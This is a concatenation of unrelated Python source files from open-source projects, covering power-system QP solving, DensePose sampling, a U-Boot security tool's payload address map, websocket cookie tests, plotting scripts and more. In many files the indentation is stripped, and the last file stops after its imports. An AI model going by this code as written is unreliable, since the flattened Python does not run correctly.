rev = request.get_form_var('rev', project.default_branch)
allfiles = project.repo.get_tree(rev, path=path)
allfiles = [_add_file_type_and_warns(f) for f in allfiles]
errors = ''
project_name = self.proj
project = CodeDoubanProject.get_by_name(project_name)
ref = rev
if ref is None:
ref = project.default_branch
branches = project.repo.branches
tags = project.repo.tags
ref_type = 'branch' if ref in branches else 'tag' \
if ref in tags else 'tree'
if self.output == 'json':
return json.dumps(allfiles)
else:
return st('browsefiles.html', **locals())
def _add_file_type_and_warns(node):
code_file_exts = 'py rb c h html mako ptl js css less handlebars coffee sql'.split() # noqa
bad_exts = 'pyc exe'.split()
    node_ext = node['path'].rsplit('.', 1)[-1] if '.' in node['path'] else ''
if node['type'] == 'tree':
icon_type = 'directory'
elif node['type'] == 'commit':
icon_type = 'submodule'
elif node_ext in code_file_exts:
icon_type = 'code-file'
else:
icon_type = 'text-file'
node['icon-type'] = icon_type
if node_ext in bad_exts:
node['warn'] = 'bad'
else:
node['warn'] = 'no'
return node
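# Example (illustrative node dict as returned by project.repo.get_tree):
#   _add_file_type_and_warns({'path': 'setup.py', 'type': 'blob'})
#   # -> sets 'icon-type' to 'code-file' and 'warn' to 'no'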
|
tools/accuracy_checker/openvino/tools/accuracy_checker/postprocessor/resize_style_transfer.py | TolyaTalamanov/open_model_zoo | 2,201 | 12750238 | """
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
from PIL import Image
from ..postprocessor import Postprocessor
from ..representation import StyleTransferAnnotation, StyleTransferPrediction
from ..config import NumberField
from ..utils import get_size_from_config
class ResizeStyleTransfer(Postprocessor):
__provider__ = 'resize_style_transfer'
annotation_types = (StyleTransferAnnotation, )
prediction_types = (StyleTransferPrediction, )
@classmethod
def parameters(cls):
parameters = super().parameters()
parameters.update({
'dst_width': NumberField(
value_type=int, optional=False, min_value=1, description="Destination width for resizing."
),
'dst_height': NumberField(
value_type=int, optional=False, min_value=1, description="Destination height for resizing."
)
})
return parameters
def configure(self):
self.dst_height, self.dst_width = get_size_from_config(self.config, allow_none=True)
def process_image(self, annotation, prediction):
for target in annotation:
if target is None:
continue
data = Image.fromarray(target.value)
data = data.resize((self.dst_width, self.dst_height), Image.BICUBIC)
target.value = np.array(data)
return annotation, prediction
|
pandapower/pypower/qps_pypower.py | yougnen/pandapower | 104 | 12750251 | # Copyright (c) 1996-2015 PSERC. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Quadratic Program Solver for PYPOWER.
"""
import sys
from pandapower.pypower.qps_pips import qps_pips
#from pandapower.pypower.qps_ipopt import qps_ipopt
#from pandapower.pypower.qps_cplex import qps_cplex
#from pandapower.pypower.qps_mosek import qps_mosek
#from pandapower.pypower.qps_gurobi import qps_gurobi
from pandapower.pypower.util import have_fcn
def qps_pypower(H, c=None, A=None, l=None, u=None, xmin=None, xmax=None,
x0=None, opt=None):
"""Quadratic Program Solver for PYPOWER.
A common wrapper function for various QP solvers.
Solves the following QP (quadratic programming) problem::
min 1/2 x'*H*x + c'*x
x
subject to::
l <= A*x <= u (linear constraints)
xmin <= x <= xmax (variable bounds)
Inputs (all optional except C{H}, C{c}, C{A} and C{l}):
- C{H} : matrix (possibly sparse) of quadratic cost coefficients
- C{c} : vector of linear cost coefficients
- C{A, l, u} : define the optional linear constraints. Default
values for the elements of C{l} and C{u} are -Inf and Inf,
respectively.
- C{xmin}, C{xmax} : optional lower and upper bounds on the
C{x} variables, defaults are -Inf and Inf, respectively.
- C{x0} : optional starting value of optimization vector C{x}
- C{opt} : optional options structure with the following fields,
all of which are also optional (default values shown in parentheses)
- C{alg} (0) - determines which solver to use
- 0 = automatic, first available of BPMPD_MEX, CPLEX,
Gurobi, PIPS
- 100 = BPMPD_MEX
- 200 = PIPS, Python Interior Point Solver
pure Python implementation of a primal-dual
interior point method
- 250 = PIPS-sc, a step controlled variant of PIPS
- 300 = Optimization Toolbox, QUADPROG or LINPROG
- 400 = IPOPT
- 500 = CPLEX
- 600 = MOSEK
- 700 = Gurobi
- C{verbose} (0) - controls level of progress output displayed
- 0 = no progress output
- 1 = some progress output
- 2 = verbose progress output
- C{max_it} (0) - maximum number of iterations allowed
- 0 = use algorithm default
- C{bp_opt} - options vector for BP
- C{cplex_opt} - options dict for CPLEX
- C{grb_opt} - options dict for gurobipy
- C{ipopt_opt} - options dict for IPOPT
- C{pips_opt} - options dict for L{qps_pips}
- C{mosek_opt} - options dict for MOSEK
- C{ot_opt} - options dict for QUADPROG/LINPROG
- C{problem} : The inputs can alternatively be supplied in a single
C{problem} dict with fields corresponding to the input arguments
described above: C{H, c, A, l, u, xmin, xmax, x0, opt}
Outputs:
- C{x} : solution vector
- C{f} : final objective function value
- C{exitflag} : exit flag
- 1 = converged
- 0 or negative values = algorithm specific failure codes
- C{output} : output struct with the following fields:
- C{alg} - algorithm code of solver used
- (others) - algorithm specific fields
    - C{lmbda} : dict containing the Lagrange and Kuhn-Tucker
multipliers on the constraints, with fields:
- C{mu_l} - lower (left-hand) limit on linear constraints
- C{mu_u} - upper (right-hand) limit on linear constraints
- C{lower} - lower bound on optimization variables
- C{upper} - upper bound on optimization variables
Example from U{http://www.uc.edu/sashtml/iml/chap8/sect12.htm}:
>>> from numpy import array, zeros, Inf
>>> from scipy.sparse import csr_matrix
>>> H = csr_matrix(array([[1003.1, 4.3, 6.3, 5.9],
... [4.3, 2.2, 2.1, 3.9],
... [6.3, 2.1, 3.5, 4.8],
... [5.9, 3.9, 4.8, 10 ]]))
>>> c = zeros(4)
>>> A = csr_matrix(array([[1, 1, 1, 1 ],
... [0.17, 0.11, 0.10, 0.18]]))
>>> l = array([1, 0.10])
>>> u = array([1, Inf])
>>> xmin = zeros(4)
>>> xmax = None
>>> x0 = array([1, 0, 0, 1])
>>> solution = qps_pips(H, c, A, l, u, xmin, xmax, x0)
>>> round(solution["f"], 11) == 1.09666678128
True
>>> solution["converged"]
True
>>> solution["output"]["iterations"]
10
@author: <NAME> (PSERC Cornell)
"""
if opt is None:
opt = {}
# if x0 is None:
# x0 = array([])
# if xmax is None:
# xmax = array([])
# if xmin is None:
# xmin = array([])
## default options
if 'alg' in opt:
alg = opt['alg']
else:
alg = 0
if 'verbose' in opt:
verbose = opt['verbose']
else:
verbose = 0
##----- call the appropriate solver -----
# if alg == 0 or alg == 200 or alg == 250: ## use MIPS or sc-MIPS
## set up options
if 'pips_opt' in opt:
pips_opt = opt['pips_opt']
else:
pips_opt = {}
if 'max_it' in opt:
pips_opt['max_it'] = opt['max_it']
if alg == 200:
pips_opt['step_control'] = False
else:
pips_opt['step_control'] = True
pips_opt['verbose'] = verbose
## call solver
x, f, eflag, output, lmbda = \
qps_pips(H, c, A, l, u, xmin, xmax, x0, pips_opt)
# elif alg == 400: ## use IPOPT
# x, f, eflag, output, lmbda = \
# qps_ipopt(H, c, A, l, u, xmin, xmax, x0, opt)
# elif alg == 500: ## use CPLEX
# x, f, eflag, output, lmbda = \
# qps_cplex(H, c, A, l, u, xmin, xmax, x0, opt)
# elif alg == 600: ## use MOSEK
# x, f, eflag, output, lmbda = \
# qps_mosek(H, c, A, l, u, xmin, xmax, x0, opt)
# elif 700: ## use Gurobi
# x, f, eflag, output, lmbda = \
# qps_gurobi(H, c, A, l, u, xmin, xmax, x0, opt)
# else:
# print('qps_pypower: {} is not a valid algorithm code\n'.format(alg))
if 'alg' not in output:
output['alg'] = alg
return x, f, eflag, output, lmbda |
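# Illustrative sketch (not from the repository above): calling the wrapper with the
# data from its own docstring example. Per the code above it returns the tuple
# (x, f, exitflag, output, lmbda); the option values chosen here are assumptions.
from numpy import array, zeros, Inf
from scipy.sparse import csr_matrix
from pandapower.pypower.qps_pypower import qps_pypower

H = csr_matrix(array([[1003.1, 4.3, 6.3, 5.9],
                      [4.3, 2.2, 2.1, 3.9],
                      [6.3, 2.1, 3.5, 4.8],
                      [5.9, 3.9, 4.8, 10.0]]))
c = zeros(4)
A = csr_matrix(array([[1.0, 1.0, 1.0, 1.0],
                      [0.17, 0.11, 0.10, 0.18]]))
l, u = array([1.0, 0.10]), array([1.0, Inf])
x, f, exitflag, output, lmbda = qps_pypower(
    H, c, A, l, u, xmin=zeros(4), x0=array([1.0, 0.0, 0.0, 1.0]),
    opt={'verbose': 0, 'max_it': 150})
print(exitflag, round(f, 6))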
websockets/handlers/set-cookies-samesite_wsh.py | ziransun/wpt | 575 | 12750270 |
from six.moves import urllib
def web_socket_do_extra_handshake(request):
url_parts = urllib.parse.urlsplit(request.uri)
max_age = ""
if "clear" in url_parts.query:
max_age = "; Max-Age=0"
value = "1"
if "value" in url_parts.query:
value = urllib.parse.parse_qs(url_parts.query)["value"][0]
cookies = [
"samesite-unspecified={}; Path=/".format(value) + max_age,
"samesite-lax={}; Path=/; SameSite=Lax".format(value) + max_age,
"samesite-strict={}; Path=/; SameSite=Strict".format(value) + max_age,
# SameSite=None cookies must be Secure.
"samesite-none={}; Path=/; SameSite=None; Secure".format(value) + max_age
]
for cookie in cookies:
request.extra_headers.append(("Set-Cookie", cookie))
def web_socket_transfer_data(request):
# Expect close() from user agent.
request.ws_stream.receive_message()
|
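# Illustrative sketch (not from the repository above): what the handshake handler
# above produces for a request URI carrying "?value=2" in its query string (the URI
# path is an assumption). Adding "clear" would append "; Max-Age=0" to each header.
from six.moves import urllib

query = urllib.parse.urlsplit('/set-cookies-samesite?value=2').query
value = urllib.parse.parse_qs(query)['value'][0]   # -> '2'
# Resulting Set-Cookie headers:
#   samesite-unspecified=2; Path=/
#   samesite-lax=2; Path=/; SameSite=Lax
#   samesite-strict=2; Path=/; SameSite=Strict
#   samesite-none=2; Path=/; SameSite=None; Secure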
moldesign/_tests/test_wfn.py | Autodesk/molecular-design-toolkit | 147 | 12750271 |
import pytest
import numpy as np
import moldesign as mdt
from moldesign import units as u
from moldesign.interfaces.pyscf_interface import basis_values
from .molecule_fixtures import *
from . import helpers
__PYTEST_MARK__ = 'wfn'
TESTSYSTEMS = ['h2_rhf_augccpvdz', 'h2_rhf_sto3g', 'acetylene_dft_631g']
def test_pyscf_orbital_grid_works(h2_rhf_augccpvdz):
""" Tests the basic input/output of the pyscf basis_values function
Doesn't actually test the values directly - just that the answers are mathematically consistent
"""
mol = h2_rhf_augccpvdz
wfn = mol.wfn
nbasis = len(wfn.aobasis)
coords = u.array([mol.com,
np.zeros(3)*u.angstrom,
10.0 * np.ones(3) * u.angstrom,
np.ones(3)*u.nm])
# First - check that the shape is appropriate if called without orbital coefficients
values_nocoeffs = basis_values(mol, wfn.aobasis, coords)
assert values_nocoeffs.shape == (len(coords), nbasis)
assert (values_nocoeffs[-1] == values_nocoeffs[-2]).all() # these 2 coordinates are the same
# Second - explicitly send orbital coefficients for first 2 basis functions
coeffs = np.zeros((2, nbasis))
coeffs[:2, :2] = np.identity(2)
vals_b0 = basis_values(mol, wfn.aobasis, coords, coeffs=coeffs)
assert vals_b0.shape == (len(coords), len(coeffs))
np.testing.assert_allclose(values_nocoeffs[:,:2], vals_b0)
# Third - send symmetric and anti-symmetric combinations of basis functions and check answers
plusminus = np.zeros((2, nbasis))
plusminus[:2, :2] = 1.0 / np.sqrt(2)
plusminus[1,1] = -1.0 / np.sqrt(2)
vals_plusminus = basis_values(mol, wfn.aobasis, coords, coeffs=plusminus)
assert vals_plusminus.shape == (len(coords), len(coeffs))
helpers.assert_almost_equal(vals_plusminus[:,0],
(vals_b0[:,0] + vals_b0[:,1])/np.sqrt(2))
helpers.assert_almost_equal(vals_plusminus[:,1],
(vals_b0[:,0] - vals_b0[:,1])/np.sqrt(2))
@pytest.mark.parametrize('molkey', TESTSYSTEMS)
def test_basis_function_3d_grids_same_in_pyscf_and_mdt(molkey, request):
mol = request.getfixturevalue(molkey)
randocoords = 6.0 * u.angstrom * (np.random.rand(200, 3) - 0.5)
pyscf_vals = basis_values(mol, mol.wfn.aobasis, randocoords)
with np.errstate(under='ignore'):
mdt_vals = mol.wfn.aobasis(randocoords)
helpers.assert_almost_equal(mdt_vals, pyscf_vals, decimal=5)
@pytest.mark.parametrize('molkey', ['h2_rhf_augccpvdz', 'h2_rhf_sto3g'])
@pytest.mark.screening
def test_pyscf_basis_function_space_integral_normalized(molkey, request):
mol = request.getfixturevalue(molkey)
grid = mdt.mathutils.padded_grid(mol.positions, 8.0 * u.angstrom, npoints=150)
points = grid.allpoints()
pyscf_vals = basis_values(mol, mol.wfn.aobasis, points)
assert pyscf_vals.shape == (len(points), len(mol.wfn.aobasis))
pyscf_normsqr = (pyscf_vals ** 2).sum(axis=0) * grid.dx * grid.dy * grid.dz
helpers.assert_almost_equal(pyscf_normsqr, 1.0,
decimal=4)
|
tests/functional/make_triangle_locate_images.py | dibir-magomedsaygitov/bezier | 165 | 12750283 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import matplotlib.pyplot as plt
import seaborn
from bezier import _plot_helpers
from tests.functional import test_triangle_locate
from tests.functional import utils
def make_plot(triangle_index, point_index, save_plot):
triangle = test_triangle_locate.TRIANGLES[triangle_index]
point = test_triangle_locate.POINTS[:, [point_index]]
name = f"test_triangle{triangle_index}_and_point{point_index}"
ax = triangle.plot(64)
ax.plot(
point[0, :], point[1, :], color="black", marker="o", linestyle="None"
)
ax.axis("scaled")
_plot_helpers.add_plot_boundary(ax)
if save_plot:
utils.save_fig(name)
else:
plt.title(name.replace("_", r"\_"))
plt.show()
plt.close(ax.figure)
def main():
parser = utils.get_parser()
args = parser.parse_args()
for case in test_triangle_locate.CASES:
triangle_index, point_index, _, _ = case
make_plot(triangle_index, point_index, args.save_plot)
if __name__ == "__main__":
seaborn.set() # Required in `seaborn >= 0.8`
main()
|
python/depthcharge/payload_map.py | justinforbes/depthcharge | 133 | 12750285 |
# SPDX-License-Identifier: BSD-3-Clause
# Depthcharge: <https://github.com/nccgroup/depthcharge>
"""
Implements PayloadMap - Although technically "public" this module
isn't documented in the API because its utility is tightly coupled
to internals of the Depthcharge class.
"""
from . import log
from . import builtin_payloads
from .operation import Operation
def _load_builtins(arch, payloads: list, exclude: set):
"""
Load built-in payloads into `payloads`, excluding any whose
names appear in the `exclude` set.
"""
for attr in dir(builtin_payloads):
if not isinstance(attr, str) or attr.startswith('_'):
continue
if attr in exclude:
continue
payload_dict = getattr(builtin_payloads, attr)
try:
payload = payload_dict[arch.name.lower()]
payloads.append((attr, payload))
except KeyError:
msg = 'Payload "{:s}" not implemented for {:s}'
log.warning(msg.format(attr, arch.name))
class PayloadMap:
"""
Tracks locations of deployed payloads.
The current implementation is simple and allocates space for all payloads,
even if they do not ultimately need to be deployed and used.
"""
def __init__(self, arch, base: int, **kwargs):
self._base = base
self._off = 0
self._map = {}
self._align = kwargs.get('align', 16)
self._skip_deploy = kwargs.get('skip_deploy', False)
exclude_builtins = kwargs.get('exclude_builtins', False)
excluded = kwargs.get('exclude', set())
payloads = []
# Aggregate built-in payloads
if not exclude_builtins:
_load_builtins(arch, payloads, excluded)
# Aggregate user-provided payloads
user_payloads = kwargs.get('payloads', None)
if user_payloads:
payloads += user_payloads
# Assign each payload to its corresponding location
for payload in payloads:
self.insert(payload[0], payload[1])
def insert(self, name: str, payload: bytes, required_by=None):
"""
Insert a `payload`, identified by `name`, into the PayloadMap.
This will assign it the next available address in the map.
If `required_by` is specified, the payload's association to an
:py:class:`depthcharge.Operation` subclass will be recorded. This
information can be provided later via :py:meth:`mark_required_by`.
        Returns `True` if the payload was added. If a payload with the same
        name is already present, then `False` is returned. In this latter case,
        the `required_by` information is still added to the corresponding
        entry.
"""
if name not in self._map:
address = self._base + self._off
size = len(payload)
if self._align > 1:
self._off += size + (self._align - 1)
self._off = (self._off // self._align) * self._align
else:
self._off += size
self._map[name] = {
'address': address,
'deployed': False,
'skip_deploy': self._skip_deploy,
'data': payload,
'size': size,
'required_by': set()
}
else:
log.debug('{} is already in the PayloadMap'.format(name))
if required_by:
self.mark_required_by(name, required_by)
def __iter__(self):
return iter(self._map)
def __getitem__(self, name):
try:
return self._map[name]
except KeyError:
msg = 'No such payload registered in PayloadMap: "{}"'.format(name)
raise KeyError(msg)
@property
def base_address(self):
"""
        This property specifies the base memory address to which payloads shall
        be written.
"""
return self._base
def mark_deployed(self, name, state=True):
"""
Mark the payload referred to by `name` as being deployed.
"""
payload = self._map[name]
payload['deployed'] = state
def mark_required_by(self, payload_name: str, operation):
"""
Mark the payload referred to by `name` as being required by
the specified `operation`, which may be the operation
name (str) or an instance of an Operation subclass.
A list of str or Operation instances is also permitted.
"""
if isinstance(operation, list):
for op_entry in operation:
self.mark_required_by(payload_name, op_entry)
return
if isinstance(operation, Operation):
operation = operation.name
elif not isinstance(operation, str):
msg = 'Expected operation argument to be str, Operation, or list. Got {:s}'
raise TypeError(msg.format(type(operation).__name__))
self._map[payload_name]['required_by'].add(operation)
|
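# Illustrative sketch (not from the repository above): exercising the PayloadMap API
# defined in the file, with built-in payload loading disabled so no real architecture
# is needed. The _Arch stub, base address, payload bytes and the 'MemoryReader'
# operation name are assumptions.
from depthcharge.payload_map import PayloadMap   # import path assumed from the file layout

class _Arch:
    name = 'arm'

pm = PayloadMap(_Arch(), 0x84000000, exclude_builtins=True,
                payloads=[('demo_nop_sled', b'\x00' * 32)])
entry = pm['demo_nop_sled']
print(hex(entry['address']), entry['size'], entry['deployed'])   # 0x84000000 32 False
pm.mark_required_by('demo_nop_sled', 'MemoryReader')   # record which Operation needs it
pm.mark_deployed('demo_nop_sled')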
fastrunner/utils/relation.py | FuxiongYang/faster | 227 | 12750334 | # !/usr/bin/python3
# -*- coding: utf-8 -*-
# @Author:梨花菜
# @File: relation.py
# @Time : 2019/5/27 10:16
# @Email: <EMAIL>
# @Software: PyCharm
# Mapping from API module names to the relation id in the database api table
API_RELATION = {"default": 66,
"energy.ball": 67,
"manage": 68,
"app_manage": 68,
"artisan": 69,
"goods": 70,
"member": 71,
"order": 72,
"seller": 73,
"payment": 74,
"martketing": 75,
"promotion": 76,
"purchase": 77,
"security": 78,
"logistics": 79,
"recycle": 80,
"image-search": 81,
"content": 82,
"bmpm": 83,
"bi": 84
}
# Project grouping for the Java developers
API_AUTHOR = {
"default": 1,
"tangzhu": 85,
"xuqirong": 86,
"zhanghengjian": 87,
"fengzhenwen": 88,
"lingyunlong": 89,
"chencanzhang": 90
}
NIL = '无参数'
SIGN = 'time,rode,sign'
SIGN_OR_TOKEN = SIGN + '(wb-token可选)'
SIGN_AND_TOKEN = SIGN + ',wb-token'
SESSION = 'cookie: wb_sess:xxxxxx'
COOKIE = 'cookie: wbiao.securityservice.tokenid:xxxx'
API_AUTH = {
"0": ["NIL", NIL],
"1": ["APP_GENERAL_AUTH", SIGN],
"2": ["WXMP_GENERAL_AUTH", SIGN],
"3": ["APP_MEMBER_AUTH", SIGN_AND_TOKEN],
"4": ["APP_MEMBER_COMPATIBILITY_AUTH", SIGN_OR_TOKEN],
"5": ["WXMP_MEMBER_AUTH", SIGN_AND_TOKEN],
"6": ["WXMP_MEMBER_COMPATIBILITY_AUTH", SIGN_OR_TOKEN],
"7": ["APP_USER_AUTH", SIGN_AND_TOKEN],
"8": ["APP_USER_COMPATIBILITY_AUTH", SIGN_OR_TOKEN],
"9": ["WXMP_USER_AUTH", SIGN_AND_TOKEN],
"10": ["WXMP_USER_COMPATIBILITY_AUTH", SIGN_OR_TOKEN],
"11": ["WXMP_MEMBER_COMPATIBILITY_AUTH", SESSION],
"12": ["PM_USER_AUTH", COOKIE],
"13": ["BACK_USER_AUTH", COOKIE],
"14": ["APP_NIL", NIL],
"15": ["WXMP_NIL", NIL],
"16": ["PM_NIL", NIL],
}
|
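# Illustrative sketch (not from the repository above): simple lookups against the
# tables defined in this module; 'order' and '3' are just sample keys from the dicts.
relation_id = API_RELATION.get('order', API_RELATION['default'])   # -> 72
auth_name, auth_headers = API_AUTH['3']   # -> 'APP_MEMBER_AUTH', 'time,rode,sign,wb-token'
print(relation_id, auth_name, auth_headers)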
example/generic/get_exchange_info.py | bailzx5522/huobi_Python | 611 | 12750340 |
from huobi.client.generic import GenericClient
from huobi.utils import *
generic_client = GenericClient()
list_obj = generic_client.get_exchange_info()
LogInfo.output("---- Supported symbols ----")
for symbol in list_obj.symbol_list:
LogInfo.output(symbol.symbol)
LogInfo.output("---- Supported currencies ----");
for currency in list_obj.currencies:
LogInfo.output(currency)
|
examples/source1.py | haypo/trollius | 175 | 12750354 | """Like source.py, but uses streams."""
from __future__ import print_function
import argparse
import sys
from trollius import *
from trollius import test_utils
ARGS = argparse.ArgumentParser(description="TCP data sink example.")
ARGS.add_argument(
'--tls', action='store_true', dest='tls',
default=False, help='Use TLS')
ARGS.add_argument(
'--iocp', action='store_true', dest='iocp',
default=False, help='Use IOCP event loop (Windows only)')
ARGS.add_argument(
'--stop', action='store_true', dest='stop',
default=False, help='Stop the server by sending it b"stop" as data')
ARGS.add_argument(
'--host', action='store', dest='host',
default='127.0.0.1', help='Host name')
ARGS.add_argument(
'--port', action='store', dest='port',
default=1111, type=int, help='Port number')
ARGS.add_argument(
'--size', action='store', dest='size',
default=16*1024, type=int, help='Data size')
class Debug:
"""A clever little class that suppresses repetitive messages."""
overwriting = False
label = 'stream1:'
def print_(self, *args):
if self.overwriting:
print(file=sys.stderr)
self.overwriting = 0
print(self.label, *args, file=sys.stderr)
def oprint(self, *args):
self.overwriting += 1
end = '\n'
if self.overwriting >= 3:
if self.overwriting == 3:
print(self.label, '[...]', file=sys.stderr)
end = '\r'
print(self.label, *args, file=sys.stderr, end=end)
sys.stdout.flush()
@coroutine
def start(loop, args):
d = Debug()
total = 0
sslctx = None
if args.tls:
d.print_('using dummy SSLContext')
sslctx = test_utils.dummy_ssl_context()
r, w = yield From(open_connection(args.host, args.port, ssl=sslctx))
d.print_('r =', r)
d.print_('w =', w)
if args.stop:
w.write(b'stop')
w.close()
else:
size = args.size
data = b'x'*size
try:
while True:
total += size
d.oprint('writing', size, 'bytes; total', total)
w.write(data)
f = w.drain()
if f:
d.print_('pausing')
yield From(f)
except (ConnectionResetError, BrokenPipeError) as exc:
d.print_('caught', repr(exc))
def main():
global args
args = ARGS.parse_args()
if args.iocp:
from trollius.windows_events import ProactorEventLoop
loop = ProactorEventLoop()
set_event_loop(loop)
else:
loop = get_event_loop()
try:
loop.run_until_complete(start(loop, args))
finally:
loop.close()
if __name__ == '__main__':
main()
|
conv-eng/conv.py | mjabrams/docs | 204 | 12750371 | import re
import sys
depRelHeader="""\
## %s : %s
"""
oneDepFig="""
<div class="sd-parse">
%s
%s(%s, %s)
</div>
"""
header="""\
---
layout: base
title: '%(relname)s'
shortdef : '%(shortdef)s'
---
"""
footer=""
### {\emph{advcl}: adverbial clause modifier}
relRe=re.compile(r"\{\\emph\{(.*?)\}:\s+(.*)\}\\\\$") #matches "advcl" and "adverb....ier" as two groups
### tabbing fig text
### \> ``Sam took out a 3 million dollar loan'' \> \> \emph{amod}(loan, dollar)\\
tabFigLine=re.compile(r"\\> +``(.*?)'' +\\> *\\> +\\emph\{(.*?)\}\((.*?), ?(.*?)\) *\\\\")
### \begin{deptext}[column sep=0.2em] Sam \&, \& my \& brother \& , \& arrived \\ \end{deptext}
depTextRe=re.compile(r"\\begin\{deptext\}(\[.*?\])? *(.*?)\\end\{deptext\}")
#\depedge[edge unit distance=0.5ex]{1}{4}{appos}
depEdgeRe=re.compile(r"\\depedge(\[.*?\])?\{([0-9]+)\}\{([0-9]+)\}\{(.*?)\}")
punctRe=re.compile(r"([.,!?])(?=( |$))")
class Relation:
"""I hold everything related to one relation in here, in case I want to
reorder them somehow, etc..."""
def __init__(self,name,definition):
self.name=name
self.definition=definition
self.text=depRelHeader%(name,definition)
def readDepFig(self,textIn):
# \begin{dependency}
# \begin{deptext}[column sep=0.2em]
# Sam \&, \& my \& brother \& , \& arrived \\
# \end{deptext}
# \depedge[edge unit distance=0.5ex]{1}{4}{appos}
# \end{dependency}
lines=""
while True:
line=textIn.next().strip()
if line==r"\end{dependency}":
break
lines+=" "+line
m=depTextRe.search(lines)
tokens=[t.strip() for t in m.group(2).replace(r"\\","").strip().split(r"\&")]
txt=" ".join(tokens)
self.text+="""\n\n<div class="sd-parse">\n"""
self.text+=txt+"\n"
for m in depEdgeRe.finditer(lines):
src=int(m.group(2))
target=int(m.group(3))
dType=m.group(4)
self.text+=dType+"("+tokens[src-1]+"-"+str(src)+", "+tokens[target-1]+"-"+str(target)+")\n"
self.text+="""</div>\n\n"""
def readTabbingFig(self,textIn):
while True:
line=textIn.next().strip()
if line.startswith(r"\hspace"):
continue
match=tabFigLine.match(line)
if match:
txt,dType,g,d=match.groups()
print >> sys.stderr, txt
txt=punctRe.sub(r" \1",txt).replace(r"\\","")
g=g.replace("\\","")
d=d.replace("\\","")
print >> sys.stderr, txt
print >> sys.stderr
self.text+=oneDepFig%(txt,dType,g,d)
continue
if line==r"\end{tabbing}":
return
print >> sys.stderr, "Spurious line: >>>"+line+"<<<"
def getText(self):
t=self.text
emphRe=re.compile(r"\\emph\{(.*?)\}")
t=emphRe.sub(r"*\1*",t)
quoteRe=re.compile(r"``(.*?)''")
t=quoteRe.sub(r'"\1"',t)
return t
relations={} #relType -> Relation()
currRel=None
while True:
try:
line=sys.stdin.next().strip()
except StopIteration: #Done!
break
#New relation?
match=relRe.search(line)
if match: #new relation
currRel=Relation(*match.groups())
assert currRel.name not in relations
relations[currRel.name]=currRel
continue
#Figure in tabbing?
if line.startswith(r"\begin{tabbing}"):
currRel.readTabbingFig(sys.stdin)
continue
if line.startswith(r"\begin{dependency}"):
currRel.readDepFig(sys.stdin)
continue
if line.startswith("%ENDRELS"):
break
if line.startswith("%") or line.startswith(r"\begin") or line.startswith(r"\end"):
continue
if currRel:
currRel.text+=line+" "
for r in sorted(relations):
f=open("../_en/"+r+".md","wt")
print >> f, header%{"relname":r,"shortdef":relations[r].definition}
print >> f, relations[r].getText()
print >> f, footer
f.close()
|
projects/DensePose/densepose/data/samplers/densepose_confidence_based.py | mmabrouk/detectron2 | 21,274 | 12750436 | # Copyright (c) Facebook, Inc. and its affiliates.
import random
from typing import Optional, Tuple
import torch
from densepose.converters import ToChartResultConverterWithConfidences
from .densepose_base import DensePoseBaseSampler
class DensePoseConfidenceBasedSampler(DensePoseBaseSampler):
"""
Samples DensePose data from DensePose predictions.
Samples for each class are drawn using confidence value estimates.
"""
def __init__(
self,
confidence_channel: str,
count_per_class: int = 8,
search_count_multiplier: Optional[float] = None,
search_proportion: Optional[float] = None,
):
"""
Constructor
Args:
confidence_channel (str): confidence channel to use for sampling;
possible values:
"sigma_2": confidences for UV values
"fine_segm_confidence": confidences for fine segmentation
"coarse_segm_confidence": confidences for coarse segmentation
(default: "sigma_2")
count_per_class (int): the sampler produces at most `count_per_class`
samples for each category (default: 8)
search_count_multiplier (float or None): if not None, the total number
of the most confident estimates of a given class to consider is
defined as `min(search_count_multiplier * count_per_class, N)`,
where `N` is the total number of estimates of the class; cannot be
specified together with `search_proportion` (default: None)
search_proportion (float or None): if not None, the total number of the
of the most confident estimates of a given class to consider is
defined as `min(max(search_proportion * N, count_per_class), N)`,
where `N` is the total number of estimates of the class; cannot be
specified together with `search_count_multiplier` (default: None)
"""
super().__init__(count_per_class)
self.confidence_channel = confidence_channel
self.search_count_multiplier = search_count_multiplier
self.search_proportion = search_proportion
assert (search_count_multiplier is None) or (search_proportion is None), (
f"Cannot specify both search_count_multiplier (={search_count_multiplier})"
f"and search_proportion (={search_proportion})"
)
def _produce_index_sample(self, values: torch.Tensor, count: int):
"""
Produce a sample of indices to select data based on confidences
Args:
values (torch.Tensor): an array of size [n, k] that contains
estimated values (U, V, confidences);
n: number of channels (U, V, confidences)
k: number of points labeled with part_id
count (int): number of samples to produce, should be positive and <= k
Return:
list(int): indices of values (along axis 1) selected as a sample
"""
k = values.shape[1]
if k == count:
index_sample = list(range(k))
else:
# take the best count * search_count_multiplier pixels,
# sample from them uniformly
# (here best = smallest variance)
_, sorted_confidence_indices = torch.sort(values[2])
if self.search_count_multiplier is not None:
search_count = min(int(count * self.search_count_multiplier), k)
elif self.search_proportion is not None:
search_count = min(max(int(k * self.search_proportion), count), k)
else:
search_count = min(count, k)
sample_from_top = random.sample(range(search_count), count)
index_sample = sorted_confidence_indices[:search_count][sample_from_top]
return index_sample
def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Method to get labels and DensePose results from an instance, with confidences
Args:
instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences`
Return:
labels (torch.Tensor): shape [H, W], DensePose segmentation labels
dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v
stacked with the confidence channel
"""
converter = ToChartResultConverterWithConfidences
chart_result = converter.convert(instance.pred_densepose, instance.pred_boxes)
labels, dp_result = chart_result.labels.cpu(), chart_result.uv.cpu()
dp_result = torch.cat(
(dp_result, getattr(chart_result, self.confidence_channel)[None].cpu())
)
return labels, dp_result
|
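# Illustrative sketch (not from the repository above): the index-selection rule that
# _produce_index_sample documents, restated standalone so it can be sanity-checked
# without building the DensePose sampler. Tensor sizes and the multiplier are assumptions.
import random
import torch
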